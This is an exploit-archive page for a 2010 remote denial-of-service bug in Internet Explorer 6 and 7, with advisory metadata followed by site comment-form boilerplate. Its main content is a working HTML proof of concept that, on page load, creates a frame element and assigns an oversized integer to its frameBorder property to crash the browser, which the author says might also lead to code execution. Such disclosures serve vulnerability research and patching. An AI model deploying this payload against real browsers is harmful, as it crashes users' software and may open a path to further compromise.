Microsoft Internet Explorers 6 and 7 denial of service

2010.07.29

Credit: Richard leahy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 27/07/2010
# Author: Richard leahy
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead to code execution.
 
# The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder    
causing a dos and may lead to code execution.
 
#code
 
<html>
<head>
<script>
 
function dos(){
 
  var e = document.createElement('frame');
  var prop = 'frameBorder';
 
  e[prop] = 0123456789;
}
 
</script>
</head>
<body onload="dos()">
</body>
 
</html>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft Internet Explorers 6 and 7 denial of service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.